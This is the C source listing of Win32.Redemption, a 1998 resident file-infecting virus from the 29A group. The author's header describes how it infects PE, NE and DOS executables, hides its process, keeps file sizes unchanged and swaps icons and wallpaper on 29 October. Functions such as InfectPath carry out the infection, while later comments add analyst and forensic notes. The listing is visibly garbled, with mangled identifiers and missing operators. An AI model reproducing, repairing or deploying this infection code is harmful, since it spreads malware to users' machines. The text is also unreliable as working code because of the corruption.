Win32


---------------------------------------------------------------- [win32red.c] --

/ *

Win32.redemption.9216 Virus.

(c) 1998. Jacky QWERTY / 29A.

Description

This is a resident HLL (High Level Language) Win32 appender virus

written in C. It infects all sort of EXE files: DOS EXE files, NE files,

PE files from Win32 (Win95 / NT), etc. Infected files only spread in Win32

platforms, including Win3.x with the Win32s subsystem. The virus infects

EXE files by changing the pointer at 3Ch in the MZ header which points

to the new EXE header (if any) placing another pointer to the virus own

PE header attached at the end of the file. When the virus executes, it

infects all EXE files from the Windows, System and current folders. Then it

spawns itself as another task (thus staying resident), makes itself

invisible (thus becoming unloadable) and periodically searches for non-

infected EXE files in all drives, infecting them in the background.

Most interesting feature of this virus is that infected files do not

grow at all, that is, files have same size before and after infection.

The virus compresses part of its host by using own JQCODING algorithm.

It also copies host icon to its own resource section to show original icon.

The virus has no problems related to finding the KERNEL32 base address

and its API functions. This is because all API functions are imported

implicitly from the virus own import table. The virus takes special care

of patching appropriately all RVA and RAW fields from its own PE header,

including code, data, imports, relocations and resource sections. This

is needed for the virus to spread successfully through all kinds of hosts.

PayLoad

On October the 29th, the virus replaces the main icon of all infected programs with its own icon, a 29A logo. It also changes the default

desktop wallpaper to such logo.

To Build

Just run the build.bat file to build release version. VC 6.0 compiler

was used since it proved to optimize better than Borland's or Watcom's.

Greets go to

All 29aers ..... for all the work Quality and Effort during this # 3 issue,

Keep Up The Good Work Dudees!

B0Z0 ......... · for Such Invaluable Feedback During BetateSting, thanks

a lot man, you rock!

My GF Carol .... WHO'S Been Pushing Me To Quit The Scene, But Still Not

Enough, I.o.u. # 8).

Rajaat / Sandy ... hey we all miss you .. come back to 29a!

Disclaimer

This Source Code Is Provided for Educational Purposes Only. The Author IS

NOT RESPONSIBLE IN ANY WAY, For Problems It May Cause Due To Improper USE!

(c) 1998. Jacky QWERTY / 29A.

* /

#define Win32_Lean_and_mean

#include

#ifdef TSR

#include "win95sys.h"

#ENDIF

#ifdef compr

#include "jqcoding.h"

#ENDIF

#ifdef icon

#include "winicons.h"

#include "winres.h"

#ENDIF

// constants ..

#ifdef _MSC_VER // Microsoft VC

# neydef release

# define data_section_raw 0x200 // 0xe00

# else

# define data_section_raw 0x1400 // 0x1600

# Endif

# Define compiler_data 0 // 0x30 (VC 4)

# Define sizeof_resource_data 0x504

#ENDIF

#ifdef __borlandc__ // Borland C

# neydef release

# Define data_section_raw? // 0x1000

# Define compiler_data 0

# else

# define data_section_raw? // 0x6200

# Define compiler_data 0x74

# Endif

# define sizeof_resource_data?

#ENDIF

#define virus_size (file_size - pE_HE_HE_HEADER_OFFSET)

#define startof_codedata (data_section_raw compiler_data - / pE_HEADER_OFFSET)

#define Rawselfcheck (Startof_Codedata Sizeof (Szcopyright) - 5)

#define init_vars_offset (STARTOF_CODEDATA SIZEOF (SZCopyRight) /

SizeOf (Szexts) 3 & -4)

#ifdef TSR

#define rawprogtype init_vars_offset

#define rawsrcvir (RawProgType 4)

#ELSE

#define rawsrcvir init_vars_offset

#ENDIF

#define rawoldptr2newexe (Rawsrcvir 4)

#define rawoldfilesize (RawoldPtr2newexe 4)

#ifdef compr

#define rawncomprsize (RawoldFileSize 4)

#define rawciphertarget (RawncomPrsize 4)

#define TmpVal Rawciphertarget

#ELSE

#define TmpVal RawoldFileSize

#ENDIF

#ifdef icon

#define RawoldResourceAddr (TmpVal 4)

#ENDIF

#ifndef COMPR

#define size_pad 101

#ENDIF

#define om_only false

#define Write_Access True

#define sizeof_fileext 3

#define max_filesize 0x4000000 // 64 MB

#ifdef compr

#define min_filesize 0x4000 // 16 kB

#ENDIF

#define prev_lapse 3 // 1 * 60 // 10 * 60 // Seconds

#define seek_lapse 3 // 5 // 30 // Seconds

// macros ..

#define RVA2PTR (Type, Base, RVA) ((DWORD) (DWORD) (RVA))))

#define isfile (pfinddata) (! (pfinddata) -> dwfileAttributes & /

FILE_ATTRIBUTE_DIRECTORY)))

#define isfolder (! isfile (pfinddata) && /

(pfinddata) -> cfilename [0]! = '.')

#define pushvar (Object) __ASM Push (Object)

#define popvar (Object) __ASM POP (Object)

// Type Definitions ..

#ifdef TSR

Typedef byte prog_type, * pprog_type;

#define TSR_COPY 0

#define host_copy 1

#ENDIF

Typedef byte boolb;

Typedef struct _image_relocation_data {// not defined in Winnt.h

Word relocoffset: 12;

Word relocty: 4;

} Image_relocation_data, * pimage_relocation_data; #ifdef icon

Typedef struct _iconimages {

PiconImage Platergeicon;

PiconImage psmallicon;

} IconImages, * piconimages;

#ENDIF

// Global Variables ..

Byte szcopyright [] = "(c) Win32.Redemption (c ver.1.0) by jqwerty / 29A",

Szexts [] = "ex .cr";

#ifdef TSR

PROG_TYPE progtype = host_copy;

#ENDIF

DWORD SRCVIR = pe_header_offset, oldptr2newexe = 1, OldFileSize = file_size;

#ifdef compr

DWORD NCOMPRSIZE = 1, ciphereTarget = 1;

#ENDIF

#ifdef icon

DWORD OLDRESOURCEADDR = Resource_SECTION_RVA;

#include "jq29aico.h"

#ENDIF

DWORD EXITCODE = 0;

#ifndef COMPR

DWORD_TGTVIR;

#ELSE

DWORD CIPHERSOURCE;

#ENDIF

DWORD _RVADELTA;

Handle Hhandle1, HHHANDLE2;

Byte Pathname [MAX_PATH], Hostname [MAX_PATH], TMPNAME [MAX_PATH];

WIN32_FIND_DATA FINDDATA, FINDDATATSR;

Startupinfo Startupinfo = {0};

PROCESS_INFORMATION Processinfo;

PIMAGE_DOS_HEADER PMZ, Phostmz;

PIMAGE_NT_HEADERS _PHOSTPE;

#ifdef msgbox

Boolb Cancelfolderseek = false, Cancelfileseek = FALSE

#ifdef TSR

Handle hmutex;

#ENDIF

#ENDIF

#ifdef icon

Boolb bpayloadday = false;

PIMAGE_RESOURCE_DIRECTORY PRSRCSTART;

Byte Hostlargeicon [SizeOf_Large_ICON];

Byte hostsmallicon [sizeof_small_icon];

#ENDIF

#ifdef compr

Byte Comprmem [0x10000];

#ifdef icon

#define sizeof_BMP 0x8076 // 32kb bitmap header ..

BYTE JQ29ABMP [SIZEOF_BMP] = {0};

#ENDIF

#ENDIF

#define SZ29A (SZCopyright Sizeof (Szcopyright) - 4)

#define szjq (Szcopyright Sizeof (Szcopyright) - 12)

// function declarations ..

Void Win32red (Void);

Boolb OpenMapFile (Pbyte FileName, Boolb WriteAccess);

Void Closetruncfile (Boolb WriteAccess);

Void InfectPath (Pbyte Pathname, DWORD CBYTES); Void CloseUnmapFile (Boolb WriteAccess);

Pbyte Getendofpath (Pbyte PTGT, PBYTE PSR);

PVOID RVA2RAW (DWORD RVA);

#ifdef icon

Void fixResources (pimage_resource_directory prxrcdir);

Void getDefault (PiconImages PiconImages,

Pvoid ​​pnergype;

#ENDIF

#ifdef TSR

Void Exectemp (PROG_TYPE Progtype);

__inline void seektsr (void);

Void WalkFolder;

Void HideProcess (Void);

__inline pprocess_database getprocessdb (void);

__inline pthread_database getthreaddb (void);

#ELSE

__INline Void Exectemp (Void);

#ENDIF

// function definitions ..

/*
 * win32red - entry routine of the sample (analysis notes only; the code below
 * is unchanged from the page).
 *
 * NOTE(review): this listing passed through a lossy text conversion. Identifier
 * case is altered, several operators and parentheses are missing, and the same
 * name is spelled differently from line to line. It does not compile as shown
 * and is annotated here as a reference for analysts.
 *
 * Visible control flow:
 *  - TSR builds call HideProcess() before anything else.
 *  - The running module's path is fetched with GetModuleFileName and that file
 *    is mapped read-only through OpenMAPFile; the mapping base is kept in
 *    Phostmz / SRCVIR.
 *  - When the program-type flag is not TSR_COPY, InfectPath is called for the
 *    Windows directory, the System directory and ".".
 *  - When the flag is TSR_COPY, a named mutex (name = szjq, a pointer into the
 *    copyright string) is created; if it already exists the process exits,
 *    otherwise Seektsr() runs.
 *  - After unmapping, the non-TSR_COPY path probes the same mutex with
 *    OpenMutex and calls Exectemp, then the routine ends in ExitProcess.
 *
 * Defender notes: the named mutex works as a single-instance marker, so its
 * presence is a host indicator for the resident copy; the msgbox build prints
 * the fixed strings seen below, which are useful as static signatures for
 * debug builds only.
 */
Void win32red () {

#ifdef TSR

#ifndef msgbox

Handle hmutex;

#ENDIF

HideProcess ();

#ENDIF

#ifdef icon

/* Payload code is textually included here; payload.c is not part of this page. */
#include "payload.c"

#ENDIF

IF (GetModuleFileName (0, Hostname, Max_Path) &&

OpenMAPFile (Hostname, Read_only) {

Phostmz = PMZ;

/* The two global handles are saved on the stack because the calls below
   reuse the same globals for other files. */
Pushvar (HHANDLE1); // Better Pushin / Popin Than USIN A TEMP. VAR.

Pushvar (HHANDLE2); // Better Pushin / Popin Than USIN A TEMP. VAR.

SRCVIR = (DWORD) PMZ;

#ifdef TSR

IF (ProgType! = TSR_COPY) {

#ifdef msgbox

MessageBox (Null, "Non-Resident Stage ..", SZCopyright, MB_OK);

#ENDIF

#ENDIF

#ifdef compr

Pushvar (ncomprsize);

Pushvar (Ciphertarget);

#ENDIF

/* Three fixed targets: Windows directory, System directory, current directory.
   NOTE(review): the argument lists of the first two calls are damaged on this page. */
InfectPath (Pathname, GetWindowsDirectory;);

InfectPath (Pathname, GetSystemDirectory (Pathname, 0x7f);

InfectPath (Pathname, (* Pathname = '.', 1));

#ifdef compr

Popvar (Ciphertarget);

Popvar (ncomprsize);

#ENDIF

#ifdef TSR

}

Else {

/* Resident copy: create the named mutex; an already-existing mutex means
   another resident copy is running, so this one exits. */
IF ((hmutex = Createmutex (Null, False, Szjq)))))))

IF (getLastError () == error_already_exists)

#if 1

#ifdef msgbox

Messagebox (Null, "Tsr: Mutex Exists!", Szcopyright, MB_OK,

#ENDIF

#ENDIF

CloseHandle (hmutex),

EXITPROCESS (EXITCODE); # IF 1

#ifdef msgbox

Else

MessageBox (NULL, "TSR: Mutex Created!", SZCopyright, MB_OK;

#ENDIF

#ENDIF

#ifdef msgbox

MessageBox (NULL, "Resident Stage ..", SZCopyright, MB_OK);

#ENDIF

Seektsr ();

#ifdef msgbox

MessageBox (NULL, "TSR: BYE BYE. ..", SZCopyRight, MB_OK;

#ENDIF

}

#ENDIF

Popvar (HHANDLE2); // Better Pushin / Popin Than USIN A TEMP. VAR.

Popvar (HHANDLE1); // Better Pushin / Popin Than USIN A TEMP. VAR.

PMZ = phostmz;

CloseunmapFile (Read_only);

#ifdef TSR

IF (ProgType! = TSR_COPY) {

/* Host copy: probe for the resident copy's mutex. */
IF ((hmutex = OpenMuteX (Mutex_all_Access, false, szjq))))

#ifndef msgbox

CloseHandle (hmutex);

#ELSE

CloseHandle (hmutex),

MessageBox (Null, "Host: Mutex EXISTS!", SZCopyright, MB_OK);

#ENDIF

Else

/* NOTE(review): the comparison on the GetTempPath result is truncated on this
   page; it appears to guard the Exectemp(TSR_COPY) call - unconfirmed. */
IF (GetTemppath (Max_Path, Pathname) - 1

#ifdef msgbox

MessageBox (Null, "Host: Mutex Doesn't Exist!",

Szcopyright, MB_OK,

#ENDIF

EXECTEMP (TSR_COPY);

Getendofpath (Pathname, Hostname);

EXECTEMP (Host_copy);

}

#ELSE

Getendofpath (Pathname, Hostname);

EXECTEMP ();

#ENDIF

}

EXITPROCESS (EXITCODE);

}

#ifdef TSR

Void Exectemp (PROG_TYPE Progtype) {

#ELSE

__INline void execTemp () {

#ENDIF

PBYTE PSRC, SZCMDLINE;

Handle hfindfile;

#ifdef compr

Boolb decomprok = TRUE;

#ENDIF

#ifdef TSR

DWORD CBYTES;

IF (progtype == TSR_COPY) {

IF (pathname [(cbytes = lstrlen) - 1]! = '//')

Pathname [CBYTES ] = '//';

* (PDWORD) (PDWORD) (Pathname CBYTES) = '* a92';

* (PDWORD) (Pathname CBYTES 4) = '*.';

IF ((HfindFile = FindfirstFile (Pathname, & Finddata))! =

INVALID_HANDLE_VALUE) {

Do {

LSTRCPY (Pathname Cbytes, FindData.cfileName);

Deletefile (pathname);

} while (FindNextFile (Hfindfile, & Finddata);

FindClose (HFindFile);

}

Pathname [CBYTES] = '/ x0';

}

#ENDIF

IF (! (cbytes = lstrlen (pathname),

GetTempFileName (Pathname, SZ29A, 0, Pathname) &&

(GetTemppath (max_path, pathname) - 1> = max_path - 1 ||

! (CBYTES = lstrlen (pathname),

GetTempFileName (Pathname, SZ29A, 0, PathName))))))

Return;

IF (progty! = TSR_COPY)

For (;;) {

PSRC = Pathname Lstrlen (lstrcpy (tmpname, pathname);

While (* - psrc! = '.'); * (PDWORD) (PSRC 1) = 'exe'

IF (Movefile (TmpName, Pathname)

Break;

Deletefile (tmpname);

Pathname [CBYTES] = '/ x0';

IF (! GetTempFileName (Pathname, SZ29A, 0, Pathname)

Return;

}

IF (Copyfile (Hostname, Pathname, False) &&

SetFileAttributes (Pathname, File_attribute_normal &&

(Hfindfile = FindfirstFile (Hostname, & Finddata))! =

INVALID_HANDLE_VALUE) {

IF (OpenMapFile (Pathname, Write_Access)) {

#ifdef TSR

IF (ProgType! = TSR_COPY) {

#ENDIF

PMZ-> E_LFANEW = Oldptr2neWexe;

#ifndef COMPR

Finddata.nfilesizelow = OldFileSize;

#ELSE

#ifdef msgbox

#if 0

MessageBox (Null, "Host Decoding is about to start ..",

Szcopyright, MB_OK;

#ENDIF

#ENDIF

IF (jq_decode (rva2ptr (Pbyte, PMZ, OldFileSize),

RVA2PTR (Pbyte, PMZ, Ciphertarget Ncomprsize),

NcomPrsize,

Comprmem)! = OldFileSize - CiphereTarget) {

Decomprok = false;

#ifdef msgbox

#if 1

MessageBox (Null, "Decode Error: File Is Corrupt!",

Szcopyright, MB_OK;

#ENDIF

#if 0

}

Else {

MessageBox (Null, "Host Decoded SuccesFully!",

Szcopyright, MB_OK;

#ENDIF

#ENDIF

}

#ENDIF

#ifdef TSR

}

Else

* RVA2PTR (PPROG_TYPE, RVA2PTR (pimage_nt_headers, pmz, pmz-> e_lfanew),

RawProgType) = TSR_COPY;

#ENDIF

#ifndef COMPR

UnmapViewoffile (PMZ);

Closetruncfile (Write_Access);

#ELSE

CloseunmapFile (WRITE_ACCESS);

IF (DecomproK) {

#ENDIF

Psrc = getcommandline (); while (* psrc! = 0x20 && * psrc);

IF ((szcmdline = (pbyte) GlobalLoc (LPTR, Max_Path

LSTRLEN (PSRC) 1)))) {

LSTRCAT (LSTRCPY (Szcmdline, Pathname), PSRC);

(Byte) Startupinfo.cb = sizeof (startupinfo);

IF (CreateProcess (NULL, SZCMDLINE, NULL, NULL, FALSE,

Create_new_console, null, null,

& Startupinfo, & processinfo) {

#ifdef TSR

IF (ProgType! = TSR_COPY) {

#ENDIF

WaitforsingleObject (ProcessInfo.hprocess, Infinite);

GetExitcodeProcess (ProcessInfo.hprocess, & EXIXITCODE);

CloseHandle (ProcessInfo.hthread);

CloseHandle (ProcessInfo.hprocess);

#ifdef TSR

}

#ENDIF

}

GlobalFree (Szcmdline);

}

#ifdef compr

}

#ENDIF

}

FindClose (HFindFile);

}

Deletefile (pathname);

}

/*
 * OpenMapFile - open FileName and map it into memory.
 *
 * The file handle, the mapping handle and the view base are stored in
 * file-scope globals (the two handle variables and PMZ), not returned.
 * WriteAccess selects read/write versus read-only for CreateFile,
 * CreateFileMapping and MapViewOfFile alike. Returns False when the file
 * cannot be opened, the mapping cannot be created, or the view cannot be
 * mapped; True otherwise.
 *
 * NOTE(review): identifiers and operators in this listing are damaged by text
 * conversion (for example the handle variable is spelled three ways); the
 * code is left exactly as found.
 *
 * Analyst note: in the non-COMPR build with WriteAccess set, the mapping is
 * created with an explicit size computed from the find-data file size and the
 * sample's own size, rounded to a multiple of Size_pad. The arithmetic
 * operators of that expression are missing on this page, so the exact formula
 * cannot be confirmed from here.
 */
Boolb OpenMapFile (Pbyte FileName, Boolb WriteAccess) {

#ifndef COMPR

DWord newFileSize;

#ENDIF

/* Existing files only (Open_EXISTING); other openers may still read (File_share_read). */
HHHANDE1 = CREATEFILE (FileName,

Writeaccess

Generic_Read | generic_write

: Generic_read,

File_share_read,

NULL,

Open_EXISTING,

FILE_ATTRIBUTE_NORMAL,

0);

IF (HHANDLE1 == Invalid_Handle_Value)

Return False;

HHHANDLE2 = CREATEFILEMAPPING (HHANDLE1,

NULL,

WriteAccess? Page_Readwrite: Page_Readonly,

0,

#ifdef compr

0,

#ELSE

Writeaccess

? Newfilesize =

((_TGTVIR =)

(Finddata.nfilesizerow 0x1FF &

-0x200)

PE_HEADER_OFFSET)

(Virus_Size Size_Pad - 1)))

/ Size_pad) * Size_pad

: 0,

#ENDIF

NULL);

IF (! HHANDLE2) {

CloseHandle (HHANDLE1);

Return False;

}

PMZ = MapViewoffile (HHANDLE2, WRITEACCESS? FILE_MAP_WRITE: FILE_MAP_READ,

0,

0,

#ifdef compr

0

#ELSE

WriteAccess? NewFileSize: 0

#ENDIF

);

IF (! pmz) {

/* Mapping the view failed: release both handles through the common close routine. */
Closetruncfile (WriteAccess);

Return False;

}

Return True;

}

/*
 * Closetruncfile - close the mapping handle, then the file handle.
 *
 * On the write path it first calls SetFileTime with the last-write time held
 * in the global find-data record; creation and access times are passed as
 * NULL and so are not set by this call. In the non-COMPR build it also moves
 * the file pointer to the size stored in that record and sets the end of file
 * there.
 *
 * Forensic note: because the last-write time comes from the find-data record
 * rather than from the moment of the write, the last-write time of a file
 * handled by this routine is not evidence of when it was modified.
 *
 * NOTE(review): function and handle names are mangled on this page
 * ("Setndoffile", "HHANDE1"); left as found.
 */
Void Closetruncfile (Boolb WriteAccess) {

CloseHandle (HHANDLE2);

IF (WriteAccess) {

#ifndef COMPR

SetFilePointer (HHANDE1, FINDDATA.NFILESZELOW, NULL, FILE_BEGIN);

Setndoffile (HHANDLE1);

#ENDIF

SetFileTime (HHANDE1, NULL, NULL, & FINDDATA.FTLASTWRITETIME);

}

CloseHandle (HHANDLE1);

}

Void InfectPath (Pbyte Pathname, DWORD CBYTES) {

PBYTE PSRC, PTGT, PEXT, PENDRELOCS, PrelocBase;

#ifdef compr

PBYTE PCOMPRBUF;

SystemTime SystemTime;

#ENDIF

DWORD FileExt, TGTVIR, RVADELTA, RAWDELTA, NCOUNT, NSECTIONS, NRVAS;

PIMAGE_SECTION_HEADER PSECTIONHDR;

PIMAGE_NT_HEADERS PPE, PHOSTPE;

PIMAGE_BASE_RELOCATION PRELOCS;

PIMAGE_RELOCATION_DATA PRELOCDATA;

PIMAGE_IMPORT_DESCRIPTOR PIMPORTS;

PIMAGE_THUNK_DATA PIMPORTDATA;

Handle hfindfile;

Boolb infect, bvalidhead;

#ifdef icon

IconImages IconImages;

#ENDIF

IF (0x7f <= CBYTES - 1) Return;

IF (Pathname [CBYTES - 1]! = '//') Pathname [CBYTES ] = '//';

* (PDWORD) (Pathname CBYTES) = '*. *';

#ifdef msgbox

Switch (Messagebox (Null, Pathname, Szcopyright,

MB_YESNOCANCEL | MB_ICONEXCLAMATION) {

Case IDCANCEL:

Cancelfolderseek = true;

Case IDNO:

Return;

}

#ENDIF

IF ((HfindFile = FindfirstFile (Pathname, & Finddata) ==

INVALID_HANDLE_VALUE)

Return;

Do {

{

#ifdef compr

Byte Keysecond, TMPKEYSEC

#ENDIF

IF (! isfile (& findData) || Finddata.nFileSizeHigh ||

#ifdef compr

Finddata.nfilesizelow

#ENDIF

(Finddata.nfilesizelow & -max_filesize) || #ifndef COMPR

! (Finddata.nfilesizelow% size_pad)

#ELSE

(FiletimetosystemTime (& Finddata.ftlastwrittime, & SystemTime),

TMPKEYSEC =

(Byte) ((byte) systemtime.wyear - (byte) SystemTime.wmonth

(Byte) SystemTime.wday - (byte) SystemTime.WHOUR

(Byte) SystemTime.wminute ^ 0x6a) & 0x3e),

Keysecond = TMPKEYSEC <60? TMPKEYSEC: TMPKEYSEC - 4,

Keysecond == (Byte) SystemTime.WSecond)

#ENDIF

)

CONTINUE;

#ifdef compr

(Byte) systemtime.wsecond = keysecond;

#ENDIF

}

PTGT = LSTRCPY (Pathname CBytes, Finddata.cfileName)

lstrlen (findData.cfilename);

FileExt = * (PDWORD) (PTGT - SIZEOF_FILEEXT) & ~ 0xFF202020;

PEXT = SZEXTS;

Do {

IF (FileExt! = (* (pdword) pext & ~ 0xff202020) ||

PTGT [- 1 - SIZEOF_FILEEXT]! = '.' ||

OpenMapFile (Pathname, Read_only))

CONTINUE;

Infect = false;

#ifdef compr

PCOMPRBUF = NULL;

#ENDIF

IF (PMZ-> E_MAGIC == Image_DOS_SIGNATURE) {

BvalidHeader = false;

PPE = RVA2PTR (PIMAGE_NT_HEADERS, PMZ, PMZ-> E_LFANEW);

IF ((DWORD) PMZ <(DWORD) PPE &&

(DWORD) PPE

PMZ,

Finddata.nfilesizelow)

- 0x7f &&

(BVALIDHEADER = TRUE,

PPE-> Signature == Image_NT_SIGNATURE &&

* RVA2PTR (PDWORD, PPE, RAWSELFCHECK) == 'A92 /')) {

} else {

#ifndef COMPR

Infect = true;

#ELSE

{

DWORD NMAXCOMPRSIZE;

IF ((PCOMPRBUF =

(Pbyte) GlobalAlloc

LPTR,

nmaxcomprsize =

Finddata.nfilesizelow / 8 * 9 12

)

)) {

#ifdef msgbox

#if 0

Messagebox (Null, "Host Encoding is about to start ..",

Finddata.cfilename, MB_OK);

#ENDIF

#ENDIF

NcomPrsize =

JQ_Encode (pcomprbuf nmaxcomprsize, rva2ptr (pbyte, pmz, finddata.nfilesizerow),

Finddata.nfilesizerlow - sizeof (image_dos_header),

Comprmem);

TGTVIR = (Ciphertarget Ncomprsize - PE_HEADER_OFFSET

0x1ff & -0x200) pe_header_offset;

IF (TGTVIR VIRUS_SIZE - 1

#ifdef msgbox

#if 0

MessageBox (Null, "Host Encoded Susfully!",

Finddata.cfilename, MB_OK,

#ENDIF

#ENDIF

Infect = true;

#ifdef msgbox

#if 0

Else

MessageBox (Null, "Host Encoded Succesfully, But"

"Win32.Red Code Didn't Fit,"

"Skipping File ..",

Finddata.cfilename, MB_OK);

#ENDIF

#ENDIF

}

}

#ENDIF

}

}

CloseunmapFile (Read_only);

if (! Infect ||! setfileAttributes (Pathname, File_Attribute_NORMAL) {

#ifdef compr

IF (PCOMPRBUF) GlobalFree (PCOMPRBUF);

#ENDIF

CONTINUE;

}

#ifdef msgbox

Switch (Messagebox (Null, Pathname, Szcopyright,

MB_YESNOCANCEL | MB_ICONEXCLAMATION) {

Case IDCANCEL:

Cancelfileseek = true;

Case iDYES:

#ENDIF

IF (OpenMapFile (Pathname, Write_Access)) {

#ifdef icon

IConimages.Plargeicon = NULL;

Iconimages.psmallicon = NULL;

IF (! bPayloadDay && bvalidhead) {

GetDefaulticons (& iconImages,

RVA2PTR (PVOID, PMZ, PMZ-> E_LFANEW);

IconImages.Plargeicon {

PSRC = (pbyte) iconImages.PlargeCon;

PTGT = HostLargeicon;

ncount = sizeof_large_icon;

Do * ptgt = * psrc ; while (--ncount);

IconImages.psmallicon {

PSRC = (pbyte) iconImages.psmallicon;

Ncount = sizeof_small_icon;

Do * ptgt = * psrc ; while (--ncount);

}

}

}

#ENDIF

#ifdef compr

PTGT = RVA2PTR (PBYTE, PMZ, CiphereTarget);

PSRC = (pbyte) ciphersource; ncount = ncomprsize;

Do * ptgt = * psrc ; while (--ncount);

GlobalFree (pcomprbuf); pcomprbuf = null; // this line isbo

_phostpe = phostpe = rva2ptr (pimage_nt_headers,

PMZ,

TGTVIR);

#ELSE

_phostpe = phostpe = rva2ptr (pimage_nt_headers, // the comnted code

PMZ, // below generates

TGTVIR = _TGTVIR); // More bytez Than

#ENDIF // this Code Becoz

PTGT = (pbyte) phostpe; // the linker adds

PSRC = (pbyte) srcvir; // Other functionz

ncount = virus_size; // not needed!

Do * ptgt = * psrc ; while (--ncount); //

// copyMemory (PBYTE) (phositpe = rva2ptr (pimage_nt_headers, // not in

// pmz, // ann of DLL

// TGTVIR), // but in

// (pbyte) srcvir, // A RTL.

// virus_size); //

#ifdef TSR

IF (progtype == TSR_Copy)

* RVA2PTR (PPROG_TYPE, PhOSTPE, RAWPROGTYPE) = host_copy;

#ENDIF

* RVA2PTR (PDWORD, PhoStpe, Rawsrcvir) = TGTVIR;

* RVA2PTR (pdword, phositpe, rawoldptr2newexe) = PMZ-> E_LFANEW;

* RVA2PTR (pdword, phositpe, rawoldfilesize) = finddata.nfilesizelow;

#ifdef compr

* RVA2PTR (PDWORD, Phostpe, RawncomPrsize) = ncomprsize;

* RVA2PTR (PDWORD, PhoStpe, Rawciphertarget) = CiphereTarget;

#ENDIF

_RVADELTA = RVADELTA =

((Phositpe-> optionalHeader.sizeOfheaders =

(Rawdelta = TGTVIR - Phostmz-> E_LFANEW))

0xFFF & -0x1000)

- phostpe-> optionalHeader.BaseOfcode

// fix rvas in peheader ..

PhoStpe-> OptionalHeader.addressofentryPoint = RVADELTA;

PhoStpe-> OptionalHeader.BaseOfcode = RVADELTA;

PhoStpe-> OptionalHeader.BaseOfData = rvadelta;

PsectionHDR = image_first_section (phostpe);

Nsections = phostpe-> fileheader.numberofsections; do {

PsectionHDR-> PointertorawData = Rawdelta;

PsectionHDR -> VirtualAddress = RVADELTA;

WHILE (--NSECTIONS);

Phostpe-> optionalHeader.sizeOfImage =

(PsectionHDR - 1) -> VirtualAddress

(PsectionHDR - 1) -> Misc.Virtualsize

0xFFF & -0x1000;

NRVAS = Phostpe-> OptionalHeader.NumberofrvaAndsizes;

Do {

IF (! Phostpe-> OptionalHeader.DataDirectory [- nrvas].

VirtualAddress)

CONTINUE;

Phostpe-> OptionalHeader.DataDirectory [NRVAS].

VirtualAddress = RVADELTA;

WHILE (NRVAS);

// fix rvas in code & reloc section ..

Pendrelocs =

RVA2PTR

PBYTE,

(Prelocs =

RVA2RAW (PhoStpe-> OptionalHeader.

DataDirectory [image_directory_entry_basereeloc].

VirtualAddress),

PhoStpe-> OptionalHeader.

DataDirectory [image_directory_entry_basereeloc].

SIZE - Image_sizeOf_base_relocation;

Do {

PrelocBase = rva2raw (prelocs-> virtualaddress = rvadelta);

Prelocdata = (PIMAGE_RELOCATION_DATA) (Prelocs 1);

(DWORD) preline = prelocs-> sizeofblock;

Do {

IF (preLocdata-> reloctype! = image_rel_based_highlow)

CONTINUE;

* RVA2PTR (PDWORD,

PrelocBase,

Prelocdata-> relocoffset) = rVadelta;

} while ((DWORD) Prelocdata <(DWORD) Prelocs;

} While (DWORD) Prelocs <(DWORD) PENDRELOCS;

// fix rvas in import section ..

Pimports =

RVA2RAW (PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Import].

VirtualAddress;

Do {

PimportData =

#ifDef _MSC_VER

RVA2RAW ((DWORD) Pimports-> OriginalFirstthunk = RVADELTA);

#ENDIF

#ifdef __borlandc__

RVA2RAW ((DWORD) Pimports-> u.originalfirstthunk = rvadelta); # ENDIF

IF (DWORD) PIMPORTDATA)

Do {

(DWORD) PIMPORTDATA-> U1.AddressofData = RVADELTA;

} While ( PimportData) -> u1.addressofdata);

Pimports-> Name = rvadelta;

PimportData = RVA2RAW ((DWORD) Pimports-> Firstthunk = RVADELTA);

Do {

(DWORD) PIMPORTDATA-> U1.AddressofData = RVADELTA;

} While ( PimportData) -> u1.addressofdata);

} While ( pimports) -> name);

#ifdef icon

// fix rvas in resource section ..

PRSRCSTART =

RVA2RAW (PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

VirtualAddress = (* RVA2PTR (PDWORD,

PhoStpe,

RawoldResourceAddr)

= Rvadelta));

(PBYTE) PRSRCSTART [0x2e] = 2;

(PBYTE) PRSRCSTART [0x4e4] = 2;

FixResources (PRSRCSTART);

ICONIMAGES.PLARGEICON || bpayloadday) {

PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

SIZE = SizeOf_Resource_Data;

PTGT = (pbyte) PRSRCSTART 0XD0;

PSRC = HostLargeicon;

ncount = sizeof_large_icon;

Do * ptgt = * psrc ; while (--ncount);

IconImages.psmallicon || bPayloadDay) {

Ncount = sizeof_small_icon;

Do * ptgt = * psrc ; while (--ncount);

}

Else {

((PBYTE) PRSRCSTART [0x2e] = 1;

(PBYTE) PRSRCSTART [0x4e4] = 1;

}

}

Else {

PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

VirtualAddress = 0;

PhoStpe-> OptionalHeader.

DATADIRECTORY [Image_Directory_Entry_Resource].

SIZE = 0;

}

#ENDIF

PMZ-> E_LFANEW = TGTVIR;

#ifdef compr

SystemTimetOfiletime (& SystemTime, & Finddata.ftlastWritetime);

#ENDIF

CloseunmapFile (WRITE_ACCESS);

}

#ifdef msgbox

}

#ENDIF

SetFileAttributes (Pathname, Finddata.dwfileAttributes);

#ifdef msgbox

Cancelfileseek {

Cancelfileseek = false;

Goto Breakhere; // can't use break; because of the 2 while's.

}

#ENDIF

#ifdef compr

IF (PCOMPRBUF) GlobalFree (PCOMPRBUF);

#ENDIF

} while (* (pEXT = sizeof_fileext);

} while (FindNextFile (Hfindfile, & Finddata);

#ifdef msgbox

Breakhere:

#ENDIF

FindClose (HFindFile);

}

/*
 * CloseunMapFile - unmap the view at PMZ and release the file.
 *
 * Non-COMPR build: closes the mapping handle, re-applies the last-write time
 * from the global find-data record when WriteAccess is set, then closes the
 * file handle (no truncation on this path).
 * COMPR build: delegates to Closetruncfile after unmapping.
 *
 * Forensic note: as in Closetruncfile, the last-write time written here is
 * taken from the find-data record, so it does not reflect the time of the
 * write.
 */
Void CloseunMapFile (Boolb WriteAccess) {

UnmapViewoffile (PMZ);

#ifndef COMPR

CloseHandle (HHANDLE2);

IF (WriteAccess)

SetFileTime (HHANDE1, NULL, NULL, & FINDDATA.FTLASTWRITETIME);

CloseHandle (HHANDLE1);

#ELSE

Closetruncfile (WriteAccess);

#ENDIF

}

/*
 * getendofpath - works on the last path component of PSR and the buffer PTGT.
 *
 * The first loop advances PSREND to the terminator of PSR; the second walks it
